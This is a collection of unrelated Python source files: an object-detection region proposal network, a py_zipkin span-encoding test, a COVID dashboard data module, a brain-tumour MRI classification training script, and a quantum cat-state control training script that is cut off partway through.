self.rpn_build_target_layer = rpnBuildTargetLayer(feature_stride=self.feature_stride, anchor_scales=self.anchor_scales, anchor_ratios=self.anchor_ratios, mode=self.mode, cfg=self.cfg)
'''forward'''
def forward(self, x, gt_boxes, img_info, num_gt_boxes):
batch_size = x.size(0)
# do base classifiction and regression
x = self.rpn_conv_trans(x)
x_cls = self.rpn_conv_cls(x)
x_reg = self.rpn_conv_reg(x)
# do softmax to get probs
x_cls_reshape = x_cls.view(x_cls.size(0), 2, -1, x_cls.size(3))
probs = F.softmax(x_cls_reshape, 1)
probs = probs.view(x_cls.size())
# get RoIs
rois = self.rpn_proposal_layer((probs.data, x_reg.data, img_info))
# define loss
rpn_cls_loss = torch.Tensor([0]).type_as(x)
rpn_reg_loss = torch.Tensor([0]).type_as(x)
# while training, calculate loss
if self.mode == 'TRAIN' and gt_boxes is not None:
targets = self.rpn_build_target_layer((x_cls.data, gt_boxes, img_info, num_gt_boxes))
# --classification loss
x_cls_preds = x_cls_reshape.permute(0, 2, 3, 1).contiguous().view(batch_size, -1, 2)
labels = targets[0].view(batch_size, -1)
keep_idxs = labels.view(-1).ne(-1).nonzero().view(-1)
x_cls_preds_keep = torch.index_select(x_cls_preds.view(-1, 2), 0, keep_idxs.data)
labels_keep = torch.index_select(labels.view(-1), 0, keep_idxs.data)
labels_keep = labels_keep.long()
if self.cfg.RPN_CLS_LOSS_SET['type'] == 'cross_entropy':
rpn_cls_loss = CrossEntropyLoss(preds=x_cls_preds_keep,
targets=labels_keep,
loss_weight=self.cfg.RPN_CLS_LOSS_SET['cross_entropy']['weight'],
size_average=self.cfg.RPN_CLS_LOSS_SET['cross_entropy']['size_average'])
else:
raise ValueError('Unkown classification loss type <%s>...' % self.cfg.RPN_CLS_LOSS_SET['type'])
# --regression loss
bbox_targets, bbox_mask = targets[1:]
if self.cfg.RPN_REG_LOSS_SET['type'] == 'betaSmoothL1Loss':
rpn_reg_loss = betaSmoothL1Loss(x_reg[bbox_mask>0].view(-1, 4),
bbox_targets[bbox_mask>0].view(-1, 4),
beta=self.cfg.RPN_REG_LOSS_SET['betaSmoothL1Loss']['beta'],
size_average=self.cfg.RPN_REG_LOSS_SET['betaSmoothL1Loss']['size_average'],
loss_weight=self.cfg.RPN_REG_LOSS_SET['betaSmoothL1Loss']['weight'])
else:
raise ValueError('Unkown regression loss type <%s>...' % self.cfg.RPN_REG_LOSS_SET['type'])
return rois, rpn_cls_loss, rpn_reg_loss
'''initialize weights'''
def initWeights(self, init_method):
# normal init
if init_method == 'normal':
for layer in [self.rpn_conv_trans[0], self.rpn_conv_cls, self.rpn_conv_reg]:
normalInit(layer, std=0.01)
# kaiming init
elif init_method == 'kaiming':
for layer in [self.rpn_conv_trans[0], self.rpn_conv_cls, self.rpn_conv_reg]:
kaimingInit(layer, nonlinearity='relu')
# xavier
elif init_method == 'xavier':
for layer in [self.rpn_conv_trans[0], self.rpn_conv_cls, self.rpn_conv_reg]:
xavierInit(layer, distribution='uniform')
# unsupport
else:
raise RuntimeError('Unsupport initWeights.init_method <%s>...' % init_method)
'''
Function:
generate anchors.
Input:
--size_base(int): the base anchor size (16 in faster RCNN).
--scales(list): scales for anchor boxes.
--ratios(list): ratios for anchor boxes.
Return:
--anchors(torch.FloatTensor): [nA, 4], the format is (x1, y1, x2, y2).
'''
@staticmethod
def generateAnchors(size_base=16, scales=2**np.arange(3, 6), ratios=[0.5, 1, 2]):
def getWHCxCy(anchor):
w = anchor[2] - anchor[0] + 1
h = anchor[3] - anchor[1] + 1
cx = anchor[0] + 0.5 * (w - 1)
cy = anchor[1] + 0.5 * (h - 1)
return w, h, cx, cy
def makeAnchors(ws, hs, cx, cy):
ws = ws[:, np.newaxis]
hs = hs[:, np.newaxis]
anchors = np.hstack((cx - 0.5 * (ws - 1),
cy - 0.5 * (hs - 1),
cx + 0.5 * (ws - 1),
cy + 0.5 * (hs - 1)))
return anchors
scales = np.array(scales)
ratios = np.array(ratios)
anchor_base = np.array([1, 1, size_base, size_base]) - 1
w, h, cx, cy = getWHCxCy(anchor_base)
size = w * h
size_ratios = size / ratios
ws = np.round(np.sqrt(size_ratios))
hs = np.round(ws * ratios)
anchors = makeAnchors(ws, hs, cx, cy)
tmp = list()
for i in range(anchors.shape[0]):
w, h, cx, cy = getWHCxCy(anchors[i, :])
ws = w * scales
hs = h * scales
tmp.append(makeAnchors(ws, hs, cx, cy))
anchors = np.vstack(tmp)
return torch.from_numpy(anchors).float() |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import json
from collections import OrderedDict
import mock
import pytest
from thriftpy2.protocol.binary import read_list_begin
from thriftpy2.protocol.binary import TBinaryProtocol
from thriftpy2.transport import TMemoryBuffer
from py_zipkin import Encoding
from py_zipkin import Kind
from py_zipkin import thrift
from py_zipkin import zipkin
from py_zipkin.thrift import zipkin_core
from py_zipkin.util import generate_random_64bit_string
from py_zipkin.zipkin import ZipkinAttrs
from tests.test_helpers import MockTransportHandler
def _decode_binary_thrift_objs(obj):
spans = []
trans = TMemoryBuffer(obj)
_, size = read_list_begin(trans)
for _ in range(size):
span = zipkin_core.Span()
span.read(TBinaryProtocol(trans))
spans.append(span)
return spans
def us(seconds):
return int(seconds * 1000 * 1000)
def check_v1_json(obj, zipkin_attrs, inner_span_id, ts):
inner_span, producer_span, root_span = json.loads(obj)
endpoint = {
"ipv4": "10.0.0.0",
"port": 8080,
"serviceName": "test_service_name",
}
assert root_span == {
"traceId": zipkin_attrs.trace_id,
"parentId": zipkin_attrs.parent_span_id,
"name": "test_span_name",
"id": zipkin_attrs.span_id,
"binaryAnnotations": [
{"endpoint": endpoint, "key": "some_key", "value": "some_value"},
{
"endpoint": {
"ipv6": "2001:0db8:85a3:0000:0000:8a2e:0370:7334",
"port": 8888,
"serviceName": "sa_service",
},
"key": "sa",
"value": True,
},
],
"annotations": [
{"endpoint": endpoint, "timestamp": us(ts), "value": "cs"},
{"endpoint": endpoint, "timestamp": us(ts + 10), "value": "cr"},
],
}
assert inner_span == {
"traceId": zipkin_attrs.trace_id,
"parentId": zipkin_attrs.span_id,
"name": "inner_span",
"id": inner_span_id,
"timestamp": us(ts),
"duration": us(5),
"binaryAnnotations": [],
"annotations": [{"endpoint": endpoint, "timestamp": us(ts), "value": "ws"}],
}
assert producer_span == {
"traceId": zipkin_attrs.trace_id,
"parentId": zipkin_attrs.span_id,
"name": "producer_span",
"id": inner_span_id,
"timestamp": us(ts),
"duration": us(10),
"binaryAnnotations": [],
"annotations": [{"endpoint": endpoint, "timestamp": us(ts), "value": "ms"}],
}
def check_v1_thrift(obj, zipkin_attrs, inner_span_id, ts):
inner_span, producer_span, root_span = _decode_binary_thrift_objs(obj)
endpoint = thrift.create_endpoint(
port=8080, service_name="test_service_name", ipv4="10.0.0.0",
)
binary_annotations = thrift.binary_annotation_list_builder(
{"some_key": "some_value"}, endpoint,
)
binary_annotations.append(
thrift.create_binary_annotation(
"sa",
"\x01",
zipkin_core.AnnotationType.BOOL,
thrift.create_endpoint(
port=8888,
service_name="sa_service",
ipv6="2001:0db8:85a3:0000:0000:8a2e:0370:7334",
),
)
)
expected_root = thrift.create_span(
span_id=zipkin_attrs.span_id,
parent_span_id=zipkin_attrs.parent_span_id,
trace_id=zipkin_attrs.trace_id,
span_name="test_span_name",
annotations=thrift.annotation_list_builder(
OrderedDict([("cs", ts), ("cr", ts + 10)]), endpoint,
),
binary_annotations=binary_annotations,
timestamp_s=None,
duration_s=None,
)
# py.test diffs of thrift Spans are pretty useless and hide many things
# These prints would only appear on stdout if the test fails and help comparing
# the 2 spans.
print(root_span)
print(expected_root)
assert root_span == expected_root
expected_inner = thrift.create_span(
span_id=inner_span_id,
parent_span_id=zipkin_attrs.span_id,
trace_id=zipkin_attrs.trace_id,
span_name="inner_span",
annotations=thrift.annotation_list_builder(
OrderedDict([("ws", ts)]), endpoint,
),
binary_annotations=[],
timestamp_s=ts,
duration_s=5,
)
# py.test diffs of thrift Spans are pretty useless and hide many things
# These prints would only appear on stdout if the test fails and help comparing
# the 2 spans.
print(inner_span)
print(expected_inner)
assert inner_span == expected_inner
expected_producer = thrift.create_span(
span_id=inner_span_id,
parent_span_id=zipkin_attrs.span_id,
trace_id=zipkin_attrs.trace_id,
span_name="producer_span",
annotations=thrift.annotation_list_builder(
OrderedDict([("ms", ts)]), endpoint,
),
binary_annotations=[],
timestamp_s=ts,
duration_s=10,
)
# py.test diffs of thrift Spans are pretty useless and hide many things
# These prints would only appear on stdout if the test fails and help comparing
# the 2 spans.
print(producer_span)
print(expected_producer)
assert producer_span == expected_producer
def check_v2_json(obj, zipkin_attrs, inner_span_id, ts):
inner_span, producer_span, root_span = json.loads(obj)
assert root_span == {
"traceId": zipkin_attrs.trace_id,
"name": "test_span_name",
"parentId": zipkin_attrs.parent_span_id,
"id": zipkin_attrs.span_id,
"kind": "CLIENT",
"timestamp": us(ts),
"duration": us(10),
"shared": True,
"localEndpoint": {
"ipv4": "10.0.0.0",
"port": 8080,
"serviceName": "test_service_name",
},
"remoteEndpoint": {
"ipv6": "2001:0db8:85a3:0000:0000:8a2e:0370:7334",
"port": 8888,
"serviceName": "sa_service",
},
"tags": {"some_key": "some_value"},
}
assert inner_span == {
"traceId": zipkin_attrs.trace_id,
"name": "inner_span",
"parentId": zipkin_attrs.span_id,
"id": inner_span_id,
"timestamp": us(ts),
"duration": us(5),
"localEndpoint": {
"ipv4": "10.0.0.0",
"port": 8080,
"serviceName": "test_service_name",
},
"annotations": [{"timestamp": us(ts), "value": "ws"}],
}
assert producer_span == {
"traceId": zipkin_attrs.trace_id,
"name": "producer_span",
"parentId": zipkin_attrs.span_id,
"id": inner_span_id,
"kind": "PRODUCER",
"timestamp": us(ts),
"duration": us(10),
"localEndpoint": {
"ipv4": "10.0.0.0",
"port": 8080,
"serviceName": "test_service_name",
},
}
@pytest.mark.parametrize(
"encoding,validate_fn",
[
(Encoding.V1_THRIFT, check_v1_thrift),
(Encoding.V1_JSON, check_v1_json),
(Encoding.V2_JSON, check_v2_json),
],
)
def test_encoding(encoding, validate_fn):
zipkin_attrs = ZipkinAttrs(
trace_id=generate_random_64bit_string(),
span_id=generate_random_64bit_string(),
parent_span_id=generate_random_64bit_string(),
is_sampled=True,
flags=None,
)
inner_span_id = generate_random_64bit_string()
mock_transport_handler = MockTransportHandler(10000)
# Let's hardcode the timestamp rather than call time.time() every time.
# The issue with time.time() is that the convertion to int of the
# returned float value * 1000000 is not precise and in the same test
# sometimes returns N and sometimes N+1. This ts value doesn't have that
# issue afaict, probably since it ends in zeros.
ts = 1538544126.115900
with mock.patch("time.time", autospec=True) as mock_time:
# zipkin.py start, logging_helper.start, 3 x logging_helper.stop
# I don't understand why logging_helper.stop would run 3 times, but
# that's what I'm seeing in the test
mock_time.side_effect = iter(
[ts, ts, ts + 10, ts + 10, ts + 10, ts + 10, ts + 10]
)
with zipkin.zipkin_span(
service_name="test_service_name",
span_name="test_span_name",
transport_handler=mock_transport_handler,
binary_annotations={"some_key": "some_value"},
encoding=encoding,
zipkin_attrs=zipkin_attrs,
host="10.0.0.0",
port=8080,
kind=Kind.CLIENT,
) as span:
with mock.patch.object(
zipkin, "generate_random_64bit_string", return_value=inner_span_id,
):
with zipkin.zipkin_span(
service_name="test_service_name",
span_name="inner_span",
timestamp=ts,
duration=5,
annotations={"ws": ts},
):
span.add_sa_binary_annotation(
8888, "sa_service", "2001:0db8:85a3:0000:0000:8a2e:0370:7334",
)
with zipkin.zipkin_span(
service_name="test_service_name",
span_name="producer_span",
timestamp=ts,
duration=10,
kind=Kind.PRODUCER,
):
pass
output = mock_transport_handler.get_payloads()[0]
validate_fn(output, zipkin_attrs, inner_span_id, ts)
|
<reponame>mattttime/ECM1400-Covid-Dashboard
'''this module handles all the data in csv/json files containing the covid information to be shown on the dashboard'''
import logging
#aquires modules for scheduling events
import sched
import time
#aquires modules for accessing APIs and processing their data
import requests
import json
from uk_covid19 import Cov19API
def parse_csv_data(csv_filename):
'''opens file, then reads the data into a dictionary/list'''
logging.info("Function parse_csv_data initiated with arguments csv_filename= " + csv_filename)
file_data = open(csv_filename, "r")
#debugging print
print(file_data)
file_lines = file_data.readlines()
return file_lines
def process_covid_csv_data(covid_csv_data):
'''takes list of data and returns case numbers, current hospital cases and total deaths from the data'''
logging.info("Function process_csv_data initiated with arguments covid_csv_data= " + covid_csv_data)
#gets deaths data
current_data = covid_csv_data[14]#the 14th item in the list is the 1st with the deaths value
current_data_list = current_data.split(",")
total_deaths = current_data_list[4]#data at index 4 contains the deaths statistic
#gets cases data
cases_weekly_total = 0
for i in range(3, 10):
#loops through the required 7 days' worth of data, ignoring the 1st 2 entries(starts at index 3) as they are incomplete
current_data = covid_csv_data[i]
current_data_list = current_data.split(",")
daily_cases = current_data_list[6]
print(daily_cases)
cases_weekly_total = cases_weekly_total + int(daily_cases)
print(cases_weekly_total)
#gets hospital data
current_data = covid_csv_data[1]
current_data_list = current_data.split(",")
current_hospital_cases = current_data_list[5]
print(current_hospital_cases)
return cases_weekly_total, int(current_hospital_cases), int(total_deaths)
def covid_API_request(location="Exeter", location_type="ltla"):
'''utilises the public health england api and returns the current covid data based on the location specified'''
logging.info("Function covid_API_request initiated with variables location=" + location + ", location type=" + location_type)
try:
cases_and_deaths = {
"date": "date",
"daily_cases": "newCasesByPublishDate",
"total_cases": "cumCasesByPublishDate",
"hospital_cases": "hospitalCases",
"total_deaths": "cumDeaths28DaysByDeathDate"
}
filter_methods_local = {
#filters used for retrieving local case data
'areaType=' + location_type,
'areaName=' + location
}
filter_methods_national = {
#filter used for retrieving national case/death/hospital data
'areaType=nation',
'areaName=England'
}
api_call_local = Cov19API(filters=filter_methods_local, structure=cases_and_deaths)
api_call_national = Cov19API(filters=filter_methods_national, structure=cases_and_deaths)
#gets the needed data from the most recent phe update
api_data_local = api_call_local.get_json()
api_data_national = api_call_national.get_json()
if api_data_local == None or api_data_national == None:
raise ValueError("one or more API calls is empty")
logging.info("covid API request successful")
except ValueError:
logging.error("An API request has failed, retrying with default values")
covid_API_request()
except:
logging.error("An unknown error has occured")
return None, None
return api_data_local, api_data_national
def process_covid_json_data(covid_json_data):
'''processes data in a similar way to process_covid_csv_data, returns 3 variables containing the needed data'''
sum_cases = 0
try:
data_list = covid_json_data["data"]
for i in range(1, 7):
#sums the cases of the last 7 days, skipping the most recent entry as incomplete
last_complete_entry = data_list[i]
print(last_complete_entry)
sum_cases = sum_cases + last_complete_entry["daily_cases"]
#print(data_list[1])#prints entire dictionary(for debugging)
last_complete_death_entry = data_list[1]
last_complete_hospital_entry = data_list[2]
total_deaths = last_complete_death_entry["total_deaths"]
hospital_cases = last_complete_hospital_entry["hospital_cases"]
except TypeError:
return None, None, None
return(sum_cases, hospital_cases, total_deaths)
local_data,national_data=covid_API_request()
|
<reponame>innat/BraTS-MGMT-Classification
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import warnings
warnings.filterwarnings("ignore")
import pandas as pd
import matplotlib.pyplot as plt
from sklearn.model_selection import StratifiedKFold
import tensorflow as tf
import config
# For reproducible results
config.seed_all(config.global_seed)
config.accelerate_gpu(config.mixed_precision)
# these are corrupted id, so here we are just removing them
train_df_path, trian_img_path, registered_samples = config.sample_path(registered_samples = False)
df = pd.read_csv(train_df_path)
df = df[~df.BraTS21ID.isin([109, 709, 123])]
df = df.reset_index(drop=True)
skf = StratifiedKFold(n_splits=config.num_of_fold,
shuffle=True,
random_state=config.global_seed)
for index, (train_index, val_index) in enumerate(skf.split(X=df.index, y=df.MGMT_value)):
df.loc[val_index, 'fold'] = index
print(df.groupby(['fold', df.MGMT_value]).size())
from dataloader._3d.sample_loader import BrainTSGeneratorRegistered, BrainTSGeneratorRaw
def fold_generator(fold):
train_labels = df[df.fold != fold].reset_index(drop=True)
val_labels = df[df.fold == fold].reset_index(drop=True)
if registered_samples:
return (
BrainTSGeneratorRegistered(trian_img_path, train_labels),
BrainTSGeneratorRegistered(trian_img_path, val_labels)
)
else:
return (
BrainTSGeneratorRaw(trian_img_path, train_labels),
BrainTSGeneratorRaw(trian_img_path, val_labels)
)
# Get fold set
train_gen, val_gen = fold_generator(config.fold)
for x, y in train_gen:
print(x.shape, y.shape)
break
train_data = tf.data.Dataset.from_generator(
lambda: map(tuple, train_gen),
(tf.float32, tf.float32),
(
tf.TensorShape([config.input_height, config.input_width, config.input_depth,
config.input_channel]),
tf.TensorShape([]),
),
)
val_data = tf.data.Dataset.from_generator(
lambda: map(tuple, val_gen),
(tf.float32, tf.float32),
(
tf.TensorShape([config.input_height, config.input_width, config.input_depth,
config.input_channel]),
tf.TensorShape([]),
),
)
from augment._3d.keras_augmentation import *
from augment._3d.tf_augmentation import *
from augment._3d.volumentation import *
if config.aug_lib == 'keras' :
augmentor = keras_augment
elif config.aug_lib == 'tf':
augmentor = tf_image_augmentation
elif config.aug_lib == 'volumentations':
augmentor = volumentations_aug
else:
augmentor = None
from dataloader._3d.tf_generator import TFDataGenerator
tf_gen = TFDataGenerator(train_data,
modeling_in=modeling_in,
shuffle=True,
aug_lib=aug_lib,
augmentor=augmentor,
batch_size=batch_size,
rescale=False)
train_generator = tf_gen.get_3D_data()
x, y = next(iter(train_generator))
print(x.shape, y.shape, x.numpy().max(), y.numpy().min())
for i, (x, y) in enumerate(train_generator.take(3)):
if modeling_in == '3D':
for j in range(input_channel):
plt.figure(figsize=(30, 20))
for i in range(input_depth):
plt.subplot(8, 8, i + 1)
plt.imshow(x[0 ,:, :, i, j], cmap='gray')
plt.axis("off")
plt.title(y[0].numpy())
plt.show()
print('\n'*3)
elif modeling_in == '2D':
plt.figure(figsize=(30, 20))
for i in range(input_depth*input_channel):
plt.subplot(5, 8, i + 1)
plt.imshow(x[0 ,:, :, i], cmap='gray')
plt.axis("off")
plt.title(y[0].numpy())
tf_gen = TFDataGenerator(val_data,
modeling_in=modeling_in,
shuffle=False,
aug_lib=None,
augmentor=None,
batch_size=batch_size,
rescale=False
)
valid_generator = tf_gen.get_3D_data()
from model._3d.classifier import get_model
tf.keras.backend.clear_session()
model = get_model(input_width, input_height, input_depth, input_channel)
model.summary()
model.compile(
loss=tf.keras.losses.BinaryCrossentropy(from_logits=False),
optimizer='adam',
metrics=[tf.keras.metrics.AUC(),
tf.keras.metrics.BinaryAccuracy(name='acc')],
)
checkpoint_cb = tf.keras.callbacks.ModelCheckpoint(
filepath="model.{epoch:02d}-{val_auc:.4f}.h5",
monitor='val_auc', mode='max',
save_best_only=True, verbose=1
)
epochs = 2
model.fit(
train_generator,
epochs=epochs,
validation_data=valid_generator,
callbacks=[checkpoint_cb], verbose=1
) |
"""
Differentiable Programming Quantum Control
Example: Preparation of cat states in a quantum parametric oscillator
"""
import os, sys
sys.path.append('..')
# import common parameters
import parameters_para
import numpy as np
import qutip as qu
import argparse
import pickle # to store and visualize output
import time
import matplotlib.pyplot as plt
import matplotlib as mpl
from matplotlib import cm
import torch
from torch import optim
import torch.nn as nn
import torch.nn.functional as F
#muting matplotlib comments
#import logging
#logging.getLogger("imported_module").setLevel(logging.WARNING)
# reproducibility is good
seed=200
np.random.seed(seed)
torch.manual_seed(seed)
rng = np.random.RandomState(seed)
if torch.cuda.is_available():
torch.cuda.manual_seed_all(seed)
torch.backends.cudnn.deterministic = True
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
# device = torch.device("cpu")
class Timer(object):
def __init__(self, name=None):
self.name = name
def __enter__(self):
self.tstart = time.time()
def __exit__(self, type, value, traceback):
if self.name:
print('[%s]' % self.name,)
print('Elapsed: %s' % (time.time() - self.tstart))
class PredCorrNetwork(nn.Module):
def __init__(self, dim, n_par, target_state, pretrained=False):
super().__init__()
self.dim = dim
self.n_par = n_par
# parameters
self.n_steps = parameters_para.max_episode_steps
self.n_substeps = parameters_para.n_substeps
self.dt = parameters_para.dt
self.gamma = parameters_para.gamma
self.force_mag = parameters_para.force_mag
print("n_steps = {}, n_substeps = {}, d_t = {}".format(self.n_steps, self.n_substeps, self.dt))
# loss hyperparameters
self.C1 = 0.8 # evolution state fidelity
self.C2 = 0.01 # action amplitudes
self.C3 = 1*self.n_substeps # final state fidelity
self.C4 = 0.0 # steep grad punishment
# target states
self.target_x = torch.as_tensor(np.real(target_state), dtype=torch.float, device=device).view(1,1,dim)
self.target_y = torch.as_tensor(np.imag(target_state), dtype=torch.float, device=device).view(1,1,dim)
# Hamiltonians
a = qu.destroy(self.dim)
H_0 = parameters_para.Kerr*(a.dag()**2)*a**2 - parameters_para.pump*(a**2+a.dag()**2)
H_1 = (a+a.dag())
# H_2 = (a.dag()*a)
self.H_0_dt = np.real(H_0.full())*self.dt
self.H_0_dt = torch.as_tensor(self.H_0_dt, dtype=torch.float, device=device)
self.H_1_dt = np.real(H_1.full())*self.dt
self.H_1_dt = torch.as_tensor(self.H_1_dt, dtype=torch.float, device=device)
# self.H_2_dt = np.real(H_2.full())*self.dt
# self.H_2_dt = torch.as_tensor(self.H_2_dt, dtype=torch.float, device=device)
self.n_operator = torch.arange(self.dim, dtype=torch.float, device=device)
# the network
layers_state = [
nn.Linear(2*dim, 512),
nn.Linear(512, 256),
nn.Linear(256, 256),
nn.Linear(256, 64),
]
layers_action = [
nn.Linear(1, 128),
nn.Linear(128, 64)
]
layers_combine =[
nn.Linear(64, 64),
nn.Linear(64, 32),
nn.Linear(32, 1, bias=True)
]
# Activation functions
# Define activation functions
self.relu = nn.ReLU()
self.sigmoid = nn.Sigmoid()
self.tanh = nn.Tanh()
self.elu = nn.ELU()
self.actfunc = self.relu
self.net_state = []
for layer in layers_state:
self.net_state.extend([layer, self.actfunc])
#self.net_state.pop()
self.net_state = nn.Sequential(*self.net_state).to(device)
self.net_action = []
for layer in layers_action:
self.net_action.extend([layer, self.actfunc])
#self.net_action.pop()
self.net_action = nn.Sequential(*self.net_action).to(device)
self.net_combine = []
for layer in layers_combine:
# add maybe activation function here
self.net_combine.extend([layer, self.actfunc])
self.net_combine.pop()
self.net_combine = nn.Sequential(*self.net_combine).to(device)
if pretrained:
#https://pytorch.org/tutorials/beginner/saving_loading_models.html
#https://pytorch.org/docs/master/notes/serialization.html
checkpoint = torch.load('../data/para_model.pth')
self.net_state.load_state_dict(checkpoint['model_state_dict'])
self.net_action.load_state_dict(checkpoint['model_action_dict'])
self.net_state.train()
self.net_action.train()
print("---")
print("Pretrained network is used!")
print("---")
def number_of_parameters(self):
return(sum(p.numel() for p in self.parameters() if p.requires_grad))
def Heun(self,x,y,H_dt):
f_x, f_y = torch.matmul(H_dt,y), - torch.matmul(H_dt,x)
x_tilde, y_tilde = x + f_x, y + f_y
x, y = x + 0.5* (torch.matmul(H_dt,y_tilde) + f_x) , y + 0.5* (-torch.matmul(H_dt,x_tilde) + f_y)
return x, y
def forward(self, psi_x, psi_y):
# reshape to broadcast in matmul
x, y = psi_x.view(self.n_par, self.dim, 1), psi_y.view(self.n_par, self.dim, 1)
alpha = torch.zeros(self.n_par,1 , 1, device=device)
loss = torch.zeros(self.n_par, device=device)
fidelity_store = torch.zeros(self.n_steps, self.n_par, device=device)
last_action_store = torch.zeros(1, self.n_steps, self.n_par, device=device)
n_store = torch.zeros(self.n_steps, self.n_par, device=device)
for j in range(self.n_steps):
input = torch.cat((x, y), 1).transpose(1,2)
dalpha1 = self.net_state(input)
dalpha2 = self.net_action(alpha) #+ alpha/self.force_mag
alpha = self.net_combine(dalpha1 + dalpha2)
alpha = torch.clamp(alpha, min=-self.force_mag, max=self.force_mag)
alpha1 = alpha[:,:, 0].unsqueeze(-1)
# alpha2 = alpha[:,:, 1].unsqueeze(-1)
for _ in range(self.n_substeps):
H = self.H_0_dt+alpha1*self.H_1_dt#+alpha2*self.H_2_dt# has dimensions (n_par, dim, dim)
x, y = self.Heun(x, y, H)
fidelity = torch.matmul(self.target_x,x)**2 + torch.matmul(self.target_y,y)**2 + torch.matmul(self.target_y,x)**2+ torch.matmul(self.target_x,y)**2+2*torch.matmul(self.target_x,x)*torch.matmul(self.target_y,y)-2*torch.matmul(self.target_x,y)*torch.matmul(self.target_y,x)
mean_n = torch.einsum("b, abc->a", self.n_operator, x**2+y**2)
alpha1 = alpha1.squeeze()
# alpha2 = alpha2.squeeze()
loss += self.C1*self.gamma**j*(1-fidelity[:,0,0]) # add state infidelity Loss
abs_alpha = abs(alpha1)# + abs(alpha2)
loss += self.gamma**j*self.C2*abs_alpha
#punish large gradients
gradients=abs(alpha1-last_action_store[0, j-1])#+abs(alpha2-last_action_store[1, j-1])
loss += self.C4*gradients
# feed storage
fidelity_store[j] = fidelity[:,0,0]
last_action_store[0, j] = alpha1
# last_action_store[1, j] = alpha2
n_store[j]=mean_n
psi_x, psi_y = x.view(self.n_par, self.dim), y.view(self.n_par, self.dim)
loss += self.C3*(1-fidelity_store[-1])
loss = loss.mean()#/self.n_steps
return psi_x, psi_y, loss, fidelity_store, n_store, last_action_store
def render(axes, state, fidelities_mean, fidelities_std, last_actions_mean, n_store_mean, n_store_std):
global dim
trange = np.arange(parameters_para.max_episode_steps)
x, y = state
# clear axis of plot
axes[0].cla()
axes[1].cla()
axes[2].cla()
axes[3].cla()
axes[4].cla()
# plot the Fock distribution (maybe add -0.5 as in the qutip tutorial)
plt1 = axes[0].bar(np.arange(0, dim), x**2+y**2, color='orange')
axes[0].set_xlim([0-0.5, dim-0.5])
axes[0].set_ylim([0, 1.0])
# plot the Wigner function graph
xvec = np.linspace(-6, 6, 20)
psi_f=qu.Qobj(x[:] + 1j* y[:])
W = qu.wigner(psi_f, xvec, xvec)
wmap = qu.wigner_cmap(W) # Generate Wigner colormap
wlim = abs(W).max()
cmap = cm.get_cmap('RdBu')
plt2 = axes[1].contourf(xvec, xvec, W, 20, norm=mpl.colors.Normalize(-wlim, wlim), cmap=cmap)
plt3 = axes[2].plot(trange, last_actions_mean[0], color='blue', label='x controls')
# plt3 = axes[2].plot(trange, last_actions_mean[1], color='red', label='y controls')
axes[2].set_xlim(0, parameters_para.max_episode_steps)
# axes[2].set_ylim(-parameters_para.force_mag, parameters_para.force_mag)
plt5 = axes[3].plot(trange, fidelities_mean, color='red')
axes[3].fill_between(trange, fidelities_mean-fidelities_std, fidelities_mean+fidelities_std, alpha=0.5)
axes[3].set_xlim(0, parameters_para.max_episode_steps)
axes[3].set_ylim(0.0, 1.0)
plt6 = axes[4].plot(trange, n_store_mean, color='black')
axes[4].fill_between(trange, n_store_mean-n_store_std, n_store_mean+n_store_std, alpha=0.3, color='black')
axes[4].set_xlim(0, parameters_para.max_episode_steps)
# axes[4].set_ylim(0.0, 1.0)
axes[0].set_title(r'$|C|^2$');
axes[1].set_title("Wigner");
axes[2].set_title("u_x");
axes[3].set_title("Fidelities");
axes[4].set_title("<n>");
def create_init_state(epoch, noise_factor=0.3):
global n_par, dim
psi_x, psi_y = np.zeros((n_par,dim)), np.zeros((n_par,dim))
psi_x[:, 0], psi_y[:, 0] = 1, 0
psi_x += noise_factor*np.random.randn(n_par,dim)*np.exp(-0.3*(np.linspace(0,dim-1,dim).reshape(1,dim)))
psi_y += noise_factor*np.random.randn(n_par,dim)*np.exp(-0.3*(np.linspace(0,dim-1,dim).reshape(1,dim)))
# reshape to broadcast
norm = np.sqrt((psi_x**2+psi_y**2).sum(axis=1)).reshape(-1,1)
#print(norm)
psi_x, psi_y=psi_x/norm, psi_y/norm
psi_x, psi_y = torch.from_numpy(psi_x).float().to(device), torch.from_numpy(psi_y).float().to(device)
return psi_x, psi_y
def train(epoch, noise_factor, optimizer, scheduler):
# create the intial state
psi_x, psi_y = create_init_state(epoch, noise_factor)
with Timer('Model forward'):
psi_x, psi_y, loss, fidelity_store, n_store, last_action_store = model.forward(psi_x, psi_y)
with Timer('Backward'):
optimizer.zero_grad()
loss.backward()
nn.utils.clip_grad_norm_(model.parameters(), 40)
with Timer('Optimizer step'):
optimizer.step()
# scheduler.step(loss)
with torch.no_grad():
psi_x_np = psi_x.cpu().detach().numpy()
psi_y_np = psi_y.cpu().detach().numpy()
fidelities_mean = fidelity_store.mean(dim=1).cpu().detach().numpy()
fidelities_std = fidelity_store.std(dim=1).cpu().detach().numpy()
last_actions_mean = last_action_store.mean(dim=2).cpu().detach().numpy()
n_store_mean= n_store.mean(dim=1).cpu().detach().numpy()
n_store_std = n_store.std(dim=1).cpu().detach().numpy()
if args.render == True and epoch % args.render_every == 0:
render(axes, (psi_x_np[0], psi_y_np[0]), fidelities_mean, fidelities_std, last_actions_mean,n_store_mean,n_store_std)
fig.tight_layout()
plt.pause(0.05)
plt.draw()
#print(fidelity_store)
print("# of epoch :{}, Loss = {}, mean norm = {}".format(epoch, loss, (psi_x**2 + psi_y**2).sum(dim=1).mean()))
print('')
# store performance trajectory
pickle.dump([epoch, loss, fidelity_store[-1].mean()], fw)
@torch.no_grad()
def eval(epoch, noise_factor):
# create the intial state
psi_x, psi_y = create_init_state(epoch, noise_factor) # eval with no noise_factor
psi_x, psi_y, loss, fidelity_store, n_store, last_action_store = model.forward(psi_x, psi_y)
#print((x**2 + y**2))
psi_x_np = psi_x.cpu().detach().numpy()
psi_y_np = psi_y.cpu().detach().numpy()
fidelities_mean = fidelity_store.mean(dim=1).cpu().detach().numpy()
fidelities_std = fidelity_store.std(dim=1).cpu().detach().numpy()
last_actions_mean = last_action_store.mean(dim=2).cpu().detach().numpy()
with torch.no_grad():
if args.render == True and epoch % args.render_every == 0:
# first plot is somehow not drawn, check this!
#print('enter')
psi_x_np = psi_x.cpu().detach().numpy()
psi_y_np = psi_y.cpu().detach().numpy()
fidelities_mean = fidelity_store.mean(dim=1).cpu().detach().numpy()
fidelities_std = fidelity_store.std(dim=1).cpu().detach().numpy()
last_actions_mean = last_action_store.mean(dim=2).cpu().detach().numpy()
